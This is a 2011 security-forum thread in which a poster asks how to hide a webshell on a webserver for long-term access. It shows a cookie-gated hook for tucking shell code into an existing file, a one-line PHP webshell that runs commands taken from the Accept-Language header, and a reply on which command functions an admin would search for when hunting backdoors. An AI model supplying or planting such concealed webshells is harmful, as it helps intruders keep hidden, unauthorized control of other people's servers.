|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 149
Members: 0
Total: 149
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
hiding a webshell for long-term use |
|
Posted: Fri May 20, 2011 4:49 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
whats up guys,
anyone have advice or experience when trying to hide a shell on a webserver. what i've been doing is hiding the shell inside an existing file with something like this...
if(isset($_COOKIE['itsMe'])){
shell code
}
and then obfuscating the code.
i've read this...
http://www.waraxe.us/ftopic-1834-0-days0-orderasc-.html
Code: |
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"));?>
|
it's good but i have my own shell code that does specific functions...
so whats the best way to hide a shell for long-term use? any ideas? |
|
|
|
|
Posted: Fri May 20, 2011 10:28 am |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
Depend's of server where you want to hide shell and mostly admin hoo working on server.If is stupid you can use code you posted, but if is smart they well be grep on all system function passthru() , getenv() , exec() , system() ....etc.List is too long. |
|
|
|
|
Posted: Sat May 21, 2011 8:59 am |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
my shell needs to use the database on localhost. and thanks pexli |
|
|
|
|
Posted: Sat May 21, 2011 12:38 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
If you need access only to databases use SQLyog. |
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|